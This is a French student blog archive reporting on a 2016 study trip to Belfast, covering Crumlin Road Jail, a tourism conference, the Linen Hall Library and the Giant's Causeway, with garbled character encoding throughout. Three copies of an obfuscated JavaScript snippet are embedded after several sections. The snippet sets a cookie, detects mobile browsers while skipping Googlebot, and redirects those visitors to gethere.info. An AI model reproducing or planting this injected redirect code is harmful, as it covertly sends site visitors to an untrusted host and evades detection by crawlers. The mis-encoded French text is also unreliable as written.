Archives de catégorie : Retour sur les excursions/conférences

Crumlin Road Jail

 

Par Nesrine Ghulam & Kevin Sanchez

exemple de cellule avec mannequin
Photo Kevin Sanchez,  » le mannequin dans sa cellule », Crumlin Road Jail, Belfast, le 03 mars 2016
hall central
Photo Kevin Sanchez,  » hall central », Crumlin Road Jail, Belfast, le 03 mars 2016.
tunnel reliant la prison au tribunal
Kevin Sanchez,  » le tunnel reliant la prison au tribunal », Crumlin Road Jail, Belfast, le 03 mars 2016
tunnel reliant la prison au tribunal
Kevin Sanchez, « Tunnel », Crumlin Road Jail, Belfast, le 03 mars 2016
instrument de torture
Kevin Sanchez,  » l’instrument de torture », Cumlin Road Jail, Belfast, le 03 mars 2016

salle de pendaison

Kevin Sanchez, « la pendaison », Crumlin Road Jail, Befast, le 03 mars 2016

La visite de la Crumlin Road Jail na��A�tait pas prA�vue au programme des activitA�s. Nous avons nA�anmoins dA�cidA� da��effectuer cette excursion car la��A�tude du dark tourism est centrale dans notre voyage et cette visite reprA�sente parfaitement ce thA?me. Nous avons donc choisi jeudi 3 mars 2016 de faire la��expA�rience personnelle du tourisme noir.

Crumlin Road Jail fA�t pendant longtemps la principale prison de Belfast. Ca��est en 1846 qua��elle a ouvert pour la premiA?re fois ses portes aux prisonniers. Cet A�tablissement pA�nitencier a A�tA� actif pendant 150 ans pour fermer ses portes en 1996. La prison dA�tenait tout type de prisonniers tels que les meurtriers, les suffragettes ou encore les prisonniers politiques emprisonnA�s durant la pA�riode des Troubles tant RA�publicains que Loyalistes.

Nous A�tions accompagnA�s da��un guide pour effectuer un tour de la prison da��une durA�e de 75 minutes environ. Nous avons retracA� pas A� pas les A�tapes da��un prisonnier aprA?s sa condamnation au Palais de Justice se trouvant de la��autre cA?tA� de la rue.

La visite a commencA� par la salle des arrivA�es oA? les nouveaux prisonniers quittaient leurs habits de ville pour se vA?tir de la��uniforme carcA�ral. Nous nous sommes ensuite rendus dans le Tunnel qui comme son nom la��indique est un A�troit passage sous terre reliant le tribunal A� la prison. La visite sa��est poursuivie par le quartier des officiers puis par celui des prisonniers. Des instruments de tortures nous A�taient montrA�s et le guide nous a fait le rA�cit des heurts perpA�trA�s dans la prison entre RA�publicains et Loyalistes.

Le moment le plus marquant de la visite fA�t la piA?ce servant A� la��exA�cution de certains prisonniers. Notre guide nous a fait le rA�cit dA�taillA� des derniA?res heures du condamnA� A� mort jusqua��A� sa pendaison. Nous A�tions face A� la corde qui A�tait utilisA�e pour pendre ces prisonniers. Nous sommes ensuite descendus un niveau plus bas et avons suivi le chemin que faisait le corps aprA?s sa pendaison. La description du processus A�tait trA?s prA�cise, presque thA�A?trale. Notre guide A�tait un conteur expA�rimentA�, il jouait sur la fascination macabre que pouvait provoquer ce genre de scA?ne chez les touristes.

Cette visite nous a permis da��A?tre au cA�ur da��une expA�rience de dark tourism. Nous avons pu en comprendre les mA�canismes ainsi que les diverses motivations. Notre guide nous a bien expliquA� que certains touristes payaient dans le but da��A?tre impressionnA�s par ces histoires morbides et macabres, alors que da��autres en faisaient la��expA�rience par devoir de mA�moire. Il y a A�galement le point de vue de notre guide, pour qui relater la��histoire permet da��A�viter qua��elle ne tombe dans la��oubli tout en ayant un rA?le pA�dagogique. Selon lui, raconter et prA�senter ainsi la��histoire a un effet gA�nA�ralement positif sur le visiteur. Cela permet de ne pas faire table rase du passA�, da��entretenir la mA�moire et la��histoire locale tant dans les bons que les mauvais aspects.

Site internet de la prisonA�: http://www.crumlinroadgaol.com/

Crumlin Road Gaol, Visitor attraction and conference centre. 53-55 Crumlin Road, Belfast, BT146SA�A�A�A�A�A�

RA�fA�rences bibliographiques a�� articles scientifiques

LIARTE SA�bastien, DELACOUR HA�lA?ne, BORNAREL FrA�dA�ric, VIRGILI Sandrine, A� A�A� Ja��irai payer sur vos tombes A�a�� OpportunitA�s, enjeux et limites de la crA�ation de valeur A�conomique A� travers le dark tourism A�, [En ligne], 2A?me confA�rence de la��Association Francophone de Management du Tourisme, Centre de recherche CEREFIGE, UniversitA� de Lorraine, pp 1-12, 2015, URL : http://www.afmat.org/images/images/PDF/ACTES2015/LIARTEetal.pdf

RAFFESTIN, Claude, Nature et culture du lieu touristique. Micros, num. 2, 1985, p-5-13

STONE Philip, SHARPLEY Richard, A� Consuming dark tourism: a thanatological perspectivea�?, Annals of Tourism Research, [En ligne], Vol 35, No 2, 2008, pp 574-595, URL: http://www.ttu.ee/public/k/Kuressaare-kolledz/Kolledz/Summer_school/Stone_Sharpley_2008_Consuming_dark_tourism-_A_thanatological_perspective.pdfvar _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ConfA�rence sur le tourisme: quel avenir pour Belfast?

Par CA�cile Walder et Estelle Pannatier

ClA�mence Lehec, 2016, ConfA�rence sur le tourisme A� Belfast, Belfast Barge.
ClA�mence Lehec, 2016, ConfA�rence sur le tourisme, Belfast Barge.

AprA?s avoir passA� une matinA�e A� la��Andy Tyrie Interpretative Centre A� East Belfast, nous sommes retournA�s au centre-ville afin da��A�couter la confA�rence de Naomi Doak et Robert Heslip sur le tourisme A� Belfast. Ces deux professionnels du tourisme travaillent pour le Belfast city council. A�La confA�rence se tenait dans la Belfast Barge, un bateau amarrA� qui abrite un musA�e maritime.

Tout da��abord, Naomi Doak a contextualisA� la situation particuliA?re de Belfast. Un des fait intA�ressant qua��elle a choisi de souligner est le fait qua��il y a plus de peace lignes (murs de sA�paration entre les communautA�s) en 2016 qua��en 1998, annA�e de la signature du a�?Good friday agreementa�?, qui marque le dA�but du processus de paix.

AprA?s avoir abordA� la situation gA�nA�rale de la ville, nos interlocuteurs ont cherchA� A� nous prA�senter les diffA�rentes pistes A� l’A�tude pour dA�velopper le tourisme.

Naomi Doak sa��est tout da��abord penchA�e sur la question sensible des murals et de leurs effets sur les touristes. Elle a soulignA� les diffA�rences frappantes entre les deux genres de reprA�sentations que la��on peut observer. Les peintures du cA?tA� rA�publicain sont parfois entourA�es da��une aura mystique, oA? la��on retrouve des A�lA�ments de la culture irlandaise et ses lA�gendes. Elles invoquent la��histoire qui lie la communautA� catholique A� la��Irlande et leur vocation est unificatrice. Elles ont pour fonction de renforcer la��identitA� irlandaise. Du cA?tA� loyaliste, le sujet des fresques est souvent plus violent et les murals sont lA� pour marquer le territoire: ils reprA�sentent des hommes armA�s et portent des messages intimidants.

Ces deux visions offertes au regard des touristes ont des rA�percussions sur leur perception du conflit, et les incitent A� prendre position pour un camp. Il A�tait intA�ressant de voir ce dernier point soulevA�, car ca��est effectivement un phA�nomA?ne que nous avons pu observer au sein de notre groupe da��A�tudiants. Ces peintures ont potentiellement des retombA�es A�conomiques importantes car elles attirent des investisseurs, en particulier dans les quartiers catholiques.

Naomi Doak et Robert Heslip ont ensuite prA�sentA� leur vision du tourisme « de masse », qua��ils jugent inadaptA� au contexte belfastois. En effet, le fait que les touristes arrivent en car dans les environs des fresques, prennent quelques photos et repartent immA�diatement sans dA�penser le moindre pound, est souvent mal perA�u par les populations locales pour lesquelles les murals reprA�sentent gA�nA�ralement des sujets encore sensibles.

Les confA�renciers ont A�voquA� deux types de dA�veloppements touristiques: le dark tourism et le phoenix tourism. Le premier cherche A� attirer les touristes en prA�sentant les A�lA�ments noirs de la��histoire de la ville (la pA�riode des Troubles, mais A�galement le naufrage du Titanic) alors que le deuxiA?me, basA� sur la mA�taphore du phA�nix qui renaA�t de ces cendres, utilise le processus de paix comme attraction touristique.

Les murals, principal sujet de notre voyage da��A�tude, n’occupent pas la mA?me place dans les deux types de tourisme. En effet, pour le dark tourism, les nouvelles fresques (axA�es sur la reconstruction, le dialogue intercommunautaire,..) ne prA�sentent pas d’intA�rA?t, puisque le public cible est attirA� par les murals liA�s au conflit. Le phoenix tourism a quant A� lui besoin da��A�lA�ments qui traduisent l’A�volution du processus de paix, dont ces nouvelles fresques font partie.

Comme la��ont soulignA� Naomi Doak et Robert Heslip, la principale embA�che au dA�veloppement da��un tourisme liA� A� la mA�moire du conflit rA�side dans le fait que la ville manque d’infrastructures appropriA�es, notamment de musA�es qui racontent tant l’histoire du conflit que celle du processus de paix. En effet, les diffA�rents acteurs politiques de la ville se montrent aujourd’hui encore incapables de produire un rA�cit commun qui conviendrait A� toutes les parties. Et cette absence rend la comprA�hension de la situation belfastoise trA?s difficile pour les visiteurs. Nous y avons nous-mA?mes A�tA� confrontA�s durant notre sA�jour. En effet, lors de nos diffA�rentes visites tant du cA?tA� rA�publicain qu’unioniste, les rA�cits des diffA�rents acteurs, notamment ceux des Black Cab, A�taient empreints da��une vision encore trA?s sA�grA�guA�e du conflit.

Un deuxiA?me autre problA?me se pose en parallA?le, selon nos interlocuteurs, celui du rA�cit de la violence en lui-mA?me. En effet, raconter la violence, c’est aussi la faire revivre. Or, les populations ne sont peut-A?tre pas prA?tes A� se replonger dans cette histoire dont le souvenir est encore trop vif.

Ce qui est ressorti de cette confA�rence sont les nombreuses interrogations des responsables du tourisme face au dilemme de la mise en tourisme de Belfast. Ils nous ont demandA� A� plusieurs reprises si, en tant que visiteurs A�trangers, nous avions certaines attentes touristiques et dans quelles infrastructures celles-ci pourraient se traduire. Quelques A�lA�ments A�voquA�s par les confA�renciers sur le contexte actuel nous ont A�galement permis de mieux comprendre certains des enjeux auxquels la ville va devoir faire face dans le futur: la cA�lA�bration du centenaire de la��Easter rising, qui marque la��anniversaire de la proclamation de la premiA?re RA�publique da��Irlande, mais A�galement la perspective da��un A�ventuel Brexit, qui causerait selon les confA�renciers, un grand prA�judice A� la��Irlande du Nord, dont nombre de financements proviennent de la��Union europA�enne.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Linen Hall Library

Par Chantal Vetter

La visite de la Linen Hall Library nous a peu A� peu fait entrer dans la��histoire du conflit. FondA�e en 1788 par la Belfast Reading Society, elle est la plus ancienne bibliothA?que de la ville.

Notre groupe sa��est sA�parA� pour faire un tour guidA�, proposA� par deux bA�nA�voles. En montant A� la��A�tage supA�rieur, nous sommes passA�s A� cA?tA� da��une collection da��affiches qui nous a donnA� un aperA�u des slogans utilisA�s durant la pA�riode des Troubles. Les affiches font partie de la collection Troubled Images. Elles ont A�tA� sA�lectionnA�es parmi plus de 3a��500 posters. Leur aspect graphique et visuel ainsi que les A�crits reflA?tent les discours de cette pA�riode. La collection a dA�jA� A�tA� prA?tA�e aux USA, au pays Basque et A� la Cisjordanie, ces deux derniA?res rA�gions A�tant elles-mA?mes liA�es A� un conflit identitaire.

Troubled Images Collection, Chantal Vetter, 29.02.2016, Linen Hall library, Belfast

Notre deuxiA?me guide nous a ensuite montrA� la collection la plus originale de la bibliothA?que qui est la Northern Ireland Political Collection, originale car elle ne rassemblent pas seulement des documents A�crits comme on pourrait sa��y attendre mais aussi de nombreux objets instrumentalisA�s par les acteurs du conflit et elle est la seule en son genre. Tout a commencA� en 1969, lorsque Jimmy Vitty, le bibliothA�caire de la��A�poque, a gardA� un tract pour les Civils Rights qua��il avait reA�u dans un bar. Depuis, plus de 350a��000 objets et A�crits concernant le conflit, da��origine rA�publicaine mais aussi da��origine loyaliste, ont A�tA� rassemblA�s dans la��espace politiquement neutre de la Linen Hall Library. Entre les statuettes de Ian Paisley et de Gerry Adams qui se font face, une lavette pour bA�bA� et un t-shirt avec Bart Simpson ou encore Bob the Builder affirmant leur loyautA� au Royaume-Uni ou se prononcent pour une Irlande rA�unifiA�e, les anciens livres A�crits en perse perdent de leur importance et le bibliothA�caire A�tait bien convaincu que les souvenirs des Troubles apportent plus aux visiteurs que des pages A�crites en langues inconnues. Ces objets ont A�tA� dA�tournA�s de leur utilitA� quotidienne pour affirmer une position politique et une identitA�, par une rA�appropriation, par exemple, du terme prod, appellation utilisA�e par les Catholiques pour dA�nigrer les Protestants (Cf. lavette et Bart Simpson). Ce sont surtout les loyalistes qui utilisent des personnages populaires, mais Bob the Builder qui, lui, reconstruit les 32 comtA�s et rA�unit ainsi la��Irlande du Nord au reste de la��Irlande semble plutA?t A?tre mobilisA� par les rA�publicains.

Northern Ireland Political Collection, Chantal Vetter, 29.2.2016, Linen Hall Library, Belfast

Les objets probablement les mieux conservA�s de la bibliothA?que A�taient des messages qua��ont A�crits Bobby Sands et un autre prisonnier rA�publicain sur des papiers de cigarettes ou du papier toilette. Les messages A�tant protA�gA�s par le mince film plastique du paquet de cigarettes, ils les faisaient sortir de prison en les passant de bouche A� bouche lors da��un baiser da��adieu. Outre ces objets personnels liA�s aux Troubles, la Northern Ireland Political Collection rassemble aussi plus de 2a��000 pA�riodiques (notamment du Loyalist News et de la��An Phoblacht), les archives de la Northern Ireland Civil Rights Association et de la Northern Ireland Womens Rights Association, des nouvelles, poA�sies et piA?ces de thA�A?tresa��

La Linen Hall Library reste un endroit particulier et joue un grand rA?le pour donner A� ses visiteurs une meilleure comprA�hension du conflit en mettant A� disposition de nombreux documents relatant la vision des deux parties.

Sources:

Linen Hall Library, [en ligne], URLA�: https://www.linenhall.com, ConsultA� le 16.3.2016

Urban Dictionary, [en ligne], URLA�: http://www.urbandictionary.com/define.php?term=Prod, ConsultA� le 14.5.2016

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

La ChaussA�e des GA�ants

Par Sophie Compagnon, Anna Paiuc et Simon Paratte

Formation

La ChaussA�e des gA�ants a�� ou Gianta��s Causeway en anglais a�� est un site gA�ologique composA� de plus de 40a��000 colonnes de basalte. Elles partent de la cA?te de la��Irlande du Nord, plus prA�cisA�ment du plateau da��Antrim, et sa��enfoncent dans la��ocA�an Atlantique.

Ce site trA?s particulier a permis le dA�veloppement des sciences de la terre. En effet, il est A�tudiA� depuis plus de 300 ans et a vu sa��opposer les A�coles franA�aises et anglaises. La��une affirmait que cette formation A�tait due A� des A�lA�ments venant de la terre et la��autre de la��ocA�an. Comme nous allons le voir, ca��est une combinaison des deux qui a crA�A� ce paysage spectaculaire.

Il y a 40 A� 60 millions da��annA�es, durant la��A?re gA�ologique tertiaire, le nord de la��ocA�an Atlantique sa��est sA�parA�, crA�ant une activitA� gA�ologique violente et da��importantes coulA�es de lave. Quand la lave a refroidi, elle sa��est solidifiA�e en roche basaltique et a formA�, par couche successive de basalte, le plateau da��Antrim. Ca��est A� cause de la contraction thermique relativement rapide de la lave que celle-ci a pris la forme de colonnes hexagonales. Au fil du temps, le plateau ca��est aplani A� cause de la��A�rosion provoquA�e par la��ocA�an.

index1

Vue de la ChaussA�e des gA�ants, Sophie Compagnon, 02.03.16, ChaussA�e des gA�ants.

Le mythe

La lA�gende de la crA�ation de la chaussA�e des gA�ants provient de la mythologie celtique irlandaise. Elle raconte que deux gA�ants, Finn MacCool et Benandonner A�taient ennemis jurA�s depuis longtemps, mais ne vivant pas sur la mA?me A�le, ils ne sa��A�taient jamais confrontA�s. En effet, Finn vivait en Irlande alors que Benandonner faisait partie des gA�ants A�cossais.

Un jour, A�nervA�, Finn dA�cida de crA�er un chemin pour dA�fier enfin son ennemi. Pour ce faire, il lanA�a des pierres dans la��eau ce qui donna naissance A� la chaussA�e des gA�ants. Mais il remarqua trA?s vite son erreur en voyant arriver Benandonner, car il A�tait bien plus grand que lui. PaniquA�, Finn rentra chez lui demander de la��aide A� sa femme Oonagh qui eut rapidement la��ingA�nieuse idA�e de dA�guiser son mari en bA�bA� et da��inviter Benandonner chez elle en prA�tendant son mari parti A� la chasse.

